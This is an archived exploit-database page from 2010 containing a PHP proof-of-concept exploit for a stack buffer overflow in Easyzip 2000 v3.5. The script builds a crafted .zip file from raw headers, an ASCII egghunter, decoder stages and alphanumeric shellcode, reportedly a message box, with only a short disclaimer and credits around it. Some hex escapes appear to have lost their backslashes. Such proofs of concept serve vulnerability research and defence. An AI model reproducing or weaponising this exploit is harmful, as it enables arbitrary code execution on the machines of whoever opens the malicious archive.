
Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit

Posted on 25 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================================== Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit =============================================================== &lt;?php /* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit Author: mr_me - http://net-ninja.net/ Download: http://www.thefreesite.com/ezip35.exe Platform: Windows XP sp3 Advisory: http://www.corelan.be:8800/advisories.php?id=10-032 Greetz to: Corelan Security Team http://www.corelan.be:8800/index.php/security/corelan-team-members/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Script provided 'as is', without any warranty. Use for educational purposes only. Do not use this code to do anything illegal ! Note : you are not allowed to edit/modify this code. If you do, Corelan cannot be held responsible for any damages this may cause. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ascii lowercase and payload space &lt; 400 bytes, yet we still get code execution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */ // local file header $lf_header = &quot;x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00&quot;. &quot;x00x00x00x00x00x00x00x00xe4x0fx00x00x00&quot;; // central directory file header $cdf_header = &quot;x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00&quot;. &quot;x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00&quot;. 
&quot;x24x00x00x00x00x00x00x00&quot;; // end of central directory record $efcdr_record = &quot;x50x4Bx05x06x00x00x00x00x01x00x01x00&quot;. &quot;x12x10x00x00x02x10x00x00x00x00&quot;; // filename $_____name = &quot;x6Dx72x5Fx6Dx65x73x5Fx73x65x63x72x65x63x74&quot;. &quot;x5Fx70x61x73x73x77x6Fx72x64x73x2Ex74x78x74&quot;; // corelan security team msgbox $_____sc = &quot;VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJEON4F1W9M490R0P08654E2&quot;. &quot;M9Y2F64346K5K450115MN2G0N0B0L5C5DKO106737KO9W8P0O2L1L0P184E3U0Q8P1G3L5O9R601E671O9W&quot;. &quot;343QOO113RJOLK8M640M1K3WOL1W4Y2O613V2I4K5C0R0S0PMO2O3W2O8K9R1Z1K0S1H3PLMKM5KKK8M0S4&quot;. &quot;JJL15612J1267KM2K4D903K03&quot;; // lowercase ascii encoded egghunter $eh = &quot;j314d34djq34djk34d1431s11s7j314d34dj234dkms502ds5o0d35upj51g4241n20b0d5&quot;. &quot;225737445m51c5k5dk4j49b591e7b5k4k385bk2j55bk59359927&quot;; $decoderStage1 = &quot;x25x4ax4dx4ex55x25x35x08x31x2a&quot;. &quot;x2dx49x49x49x5ex2dx4ax49x4ax5ex2dxc1xc1xc1x5f&quot;; $decoderStage2 = &quot;x25x4Ax4dx4ex55x25x10x10x31x10&quot;. &quot;x2dx2ax69x37xc1x2dx2ax69x36xc1x2dx2bx6axb1x9b&quot;; $align = &quot;x60&quot;.str_repeat(&quot;x5d&quot;,7); $___exploit = $_____name.str_repeat(&quot;x61&quot;,249).$eh.str_repeat(&quot;x61&quot;,144-strlen($eh)).&quot;x60&quot;. str_repeat(&quot;x5b&quot;,8).$decoderStage1.$align.$decoderStage2.$align.&quot;x98x8ex89xf1x64x64&quot;. &quot;x16x32x40x00&quot;; $___exploit .= str_repeat(&quot;x61&quot;,2000-strlen($___exploit)).&quot;x57x30x30x54x57x30x30x54&quot;.$_____sc. str_repeat(&quot;x61&quot;,2056-strlen($_____sc)).&quot;x2ex74x78x74&quot;; $_____b00m = $lf_header.$___exploit.$cdf_header.$___exploit.$efcdr_record; file_put_contents(&quot;cst-easyzip.zip&quot;,$_____b00m); ?&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-25]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 
